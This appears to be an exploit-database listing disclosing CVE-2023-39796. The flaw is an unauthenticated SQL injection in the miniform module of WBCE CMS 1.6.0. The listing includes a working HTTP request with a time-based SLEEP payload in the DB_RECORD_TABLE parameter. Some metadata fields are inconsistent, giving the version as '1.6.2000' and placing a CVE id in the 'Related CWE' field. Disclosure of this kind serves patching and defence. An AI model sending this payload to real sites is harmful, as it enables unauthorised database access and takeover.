header-logo
Suggest Exploit
vendor:
WBCE CMS
by:
young pope
8.1
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: WBCE CMS
Affected Version From: 1.6.2000
Affected Version To: 1.6.2000
Patch Exists: YES
Related CWE: CVE-2023-39796
CPE: a:wbce_cms:wbce:1.6.0
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux
2023

Unauthenticated SQL injection in WBCE 1.6.0

An SQL injection vulnerability exists in the *miniform* module of WBCE CMS version 1.6.0. The vulnerability allows unauthenticated attackers to access and potentially take over the entire database. The issue arises from the lack of authentication checks in the file /modules/miniform/ajax_delete_message.php, specifically in a DELETE query on line 40. The vulnerability can be exploited by using a tick sign (`) to manipulate the query. The vulnerable parameter is DB_RECORD_TABLE.

Mitigation:

To mitigate this vulnerability, ensure all user inputs are properly validated and sanitized to prevent SQL injection attacks. Additionally, implement proper authentication mechanisms and access controls to restrict unauthorized access to sensitive functionalities.
Source

Exploit-DB raw data:

# Exploit Title: |Unauthenticated SQL injection in WBCE 1.6.0
# Date: 15.11.2023 
# Exploit Author: young pope 
# Vendor Homepage: https://github.com/WBCE/WBCE_CMS 
# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.0.zip 
# Version: 1.6.0 
# Tested on: Kali linux 
# CVE : CVE-2023-39796

There is an sql injection vulnerability in *miniform* module which is a 
default module installed in the *WBCE* cms. It is an unauthenticated 
sqli so anyone could access it and takeover the whole database.

In file /modules/miniform/ajax_delete_message.php there is no 
authentication check. On line |40| in this file, there is a |DELETE| 
query that is vulnerable, an attacker could jump from the query using 
tick sign - ```.

Function |addslashes()| 
(https://www.php.net/manual/en/function.addslashes.php) escapes only 
these characters and not a tick sign:

  * single quote (')
  * double quote (")
  * backslash ()
  * NUL (the NUL byte

The DB_RECORD_TABLE parameter is vulnerable.

If an unauthenticated attacker send this request:

```

POST /modules/miniform/ajax_delete_message.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, 
like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 162
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record

```

The response is received after 6s.

Reference links:

  * https://nvd.nist.gov/vuln/detail/CVE-2023-39796
  * https://forum.wbce.org/viewtopic.php?pid=42046#p42046
  * https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
  * https://pastebin.com/PBw5AvGp